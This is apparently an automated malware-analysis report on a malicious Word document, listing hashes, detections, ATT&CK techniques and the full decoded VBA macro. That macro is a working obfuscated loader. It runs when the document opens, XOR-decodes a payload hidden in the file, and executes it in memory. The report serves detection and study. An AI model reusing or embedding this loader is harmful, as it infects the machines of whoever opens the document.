Office (OLE) malware analysis — malicious · 961e013da3bb45e8

MALICIOUS

Office (OLE)

37.1 KB Created: 2017-08-02 20:25:00 Authoring application: Microsoft Office Word First seen: 2017-11-13

MD5: 392470db5a44834d6012d0fd4a82edce SHA-1: 1b4c333d11b693d86fa7d8b8d65628e6d4e03888 SHA-256: 961e013da3bb45e8d839104a9476f81593459617051fc56d67778202fef4e1c5

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The macros utilize `VirtualAlloc` and `NtWriteVirtualMemory` API calls, indicating an attempt to allocate memory and write shellcode. This is a common technique for downloading and executing a second-stage payload. The ClamAV detection name 'Doc.Downloader.Powload-6809817-0' further supports this behavior.

Heuristics 7

ClamAV: Doc.Downloader.Powload-6809817-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Public Sub Document_Open()
    DzofKeNBGTwQlwSzN
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
    Document_Open
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4851 bytes
SHA-256: `e4fa6a1f02d5171c0568dd21e52fce2d0b8c2d552dee2fe250d5c003ea7d7a06`
Detection ClamAV: No threats found Obfuscation or payload: likely 37 of 70 identifiers look randomly generated (e.g. 'lPBxbSPCMWTDNMFVphAvPAPZUUtOewsSMNHNkmMe') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit #If VBA7 Then Private Declare PtrSafe Function zKpeJtqFSIEYYSyAhYznLEj Lib "kernel32" Alias "CreateThread" (ByVal MgzLhhSfzNFkiZjGUzwDBDj As Long, ByVal cIyZXr As Long, ByVal mWSpDbsmPgSFZsTUgmyDYz As LongPtr, liWwIyISihcsopKGE As Long, ByVal mHwIXkKjOsNzOMNwHg As Long, FJOgoKyXZEEvGUaLSdClL As Long) As LongPtr Private Declare PtrSafe Function hENaVteUVUkdRjbfGuMWRHVinrVE Lib "kernel32" Alias "VirtualAlloc" (ByVal UEfNRUbWsnCzbrxeIzNK As Long, ByVal bweMsqe As LongPtr, ByVal cPjeiVOPwcqJJBYRYL As Long, ByVal xriJgoCThabyEXvqxsuTwJpmwx As Long) As LongPtr Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal vzxnN As LongPtr, ByVal xHjUgcPGbGOuDLMnlByD As LongPtr, ByVal wNcVmJngtJNnRgqlwrpFmudART As String, ByVal ohoWOjObThYTtCAIWbgLEwb As LongPtr, ByRef jjYFbKBdtXZYfMYedfwexyWc As LongPtr) As LongPtr #Else Private Declare Function zKpeJtqFSIEYYSyAhYznLEj Lib "kernel32" Alias "CreateThread" (ByVal MgzLhhSfzNFkiZjGUzwDBDj As Long, ByVal cIyZXr As Long, ByVal mWSpDbsmPgSFZsTUgmyDYz As Long, liWwIyISihcsopKGE As Long, ByVal mHwIXkKjOsNzOMNwHg As Long, FJOgoKyXZEEvGUaLSdClL As Long) As Long Private Declare Function hENaVteUVUkdRjbfGuMWRHVinrVE Lib "kernel32" Alias "VirtualAlloc" (ByVal UEfNRUbWsnCzbrxeIzNK As Long, ByVal bweMsqe As Long, ByVal cPjeiVOPwcqJJBYRYL As Long, ByVal xriJgoCThabyEXvqxsuTwJpmwx As Long) As Long Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal vzxnN As Long, ByVal xHjUgcPGbGOuDLMnlByD As Long, ByVal wNcVmJngtJNnRgqlwrpFmudART As String, ByVal ohoWOjObThYTtCAIWbgLEwb As Long, ByRef jjYFbKBdtXZYfMYedfwexyWc As Long) As Long #End If Const zWwgEGyhRGMzfxZZEr = &H1000 Const vJBStrOnEXYwaUllGBRhQZ = &H40 Public Sub DzofKeNBGTwQlwSzN() Dim ZlXeEuXowdfWxbOnOmiIyZOl() As Byte ZlXeEuXowdfWxbOnOmiIyZOl = PvQHHMJyiFk(ActiveDocument.FullName) Dim WpkKxavVzPrByVUiv As String WpkKxavVzPrByVUiv = StrConv(ZlXeEuXowdfWxbOnOmiIyZOl, 64) Dim KwKwvbXIFqeqawMDHeME KwKwvbXIFqeqawMDHeME = Split(WpkKxavVzPrByVUiv, "lPBxbSPCMWTDNMFVphAvPAPZUUtOewsSMNHNkmMemPELvCBpOigNxMTKZCDhyaxpDaQaeRKdvwjZWeDsteZWpFuZTXOIJEFmsphvLBlXxdrbDUOUYlOuaBZYFRghdbtQQXHHWiGRScymntwZiTKxQllQpjPUveUv") Dim cKaYmwMqroAcsdOQAUjMPueQiPUOU As String Dim GkPxBXvdyemKvchcMECxg As String Dim mVhBR As String GkPxBXvdyemKvchcMECxg = StrConv(StrConv(KwKwvbXIFqeqawMDHeME(UBound(KwKwvbXIFqeqawMDHeME)), 64), 128) mVhBR = Mid$(GkPxBXvdyemKvchcMECxg, 3, Len(GkPxBXvdyemKvchcMECxg)) cKaYmwMqroAcsdOQAUjMPueQiPUOU = hFSZyZfz("BlFnhYPEWBXcNKmugYjrWZF", mVhBR) #If VBA7 Then Dim sYvKUJykgBZXTYdcPPsUjTkLFT As LongPtr Dim txNkUwQiUY As LongPtr #Else Dim sYvKUJykgBZXTYdcPPsUjTkLFT As Long Dim txNkUwQiUY As Long #End If sYvKUJykgBZXTYdcPPsUjTkLFT = hENaVteUVUkdRjbfGuMWRHVinrVE(0, Len(cKaYmwMqroAcsdOQAUjMPueQiPUOU), zWwgEGyhRGMzfxZZEr, vJBStrOnEXYwaUllGBRhQZ) txNkUwQiUY = NtWriteVirtualMemory(-1, sYvKUJykgBZXTYdcPPsUjTkLFT, cKaYmwMqroAcsdOQAUjMPueQiPUOU, Len(cKaYmwMqroAcsdOQAUjMPueQiPUOU), 0) txNkUwQiUY = zKpeJtqFSIEYYSyAhYznLEj(0, 0, sYvKUJykgBZXTYdcPPsUjTkLFT, 0, 0, 0) End Sub Public Function PvQHHMJyiFk(ByVal ocEnHtXNgjDRj As String) As Byte() Dim GkPxBXvdyemKvchcMECxg As Long Dim mVhBR() As Byte GkPxBXvdyemKvchcMECxg = FreeFile If LenB(Dir(ocEnHtXNgjDRj)) Then Open ocEnHtXNgjDRj For Binary Access Read As GkPxBXvdyemKvchcMECxg ReDim mVhBR(LOF(GkPxBXvdyemKvchcMECxg) - 1&) As Byte Get GkPxBXvdyemKvchcMECxg, , mVhBR Close GkPxBXvdyemKvchcMECxg Else Err.Raise 53 End If PvQHHMJyiFk = mVhBR Erase mVhBR End Function Public Sub Document_Open() DzofKeNBGTwQlwSzN End Sub Sub Workbook_Open() Document_Open End Sub Public Function hFSZyZfz(LdnWkEzbXYUFexZpLBEXT As String, agnVSmmmvXIt As String) As String Dim BoBVx As Long Dim TjCWCdiTJMyBBOuchJoLnOL As String Dim XXLwxakFhkahyjLSKs As Integer, yaVBsXeFqJyDJdeIvJYXuGq As Integer, a As Long For BoBVx = 1 To Len(agnVSmmmvXIt) a = BoBVx Mod Len(LdnWkEzbXYUFexZpLBEXT) If a = 0 Then a = Len(LdnWkEzbXYUFexZpLBEXT) XXLwxakFhkahyjLSKs = Asc(Mid$(agnVSmmmvXIt, BoBVx, 1)) yaVBsXeFqJyDJdeIvJYXuGq = Asc(Mid$(LdnWkEzbXYUFexZpLBEXT, a, 1)) TjCWCdiTJMyBBOuchJoLnOL = TjCWCdiTJMyBBOuchJoLnOL + Chr(XXLwxakFhkahyjLSKs Xor yaVBsXeFqJyDJdeIvJYXuGq) Next BoBVx hFSZyZfz = TjCWCdiTJMyBBOuchJoLnOL End Function

Open this report in the interactive analyzer, or submit your own file for analysis.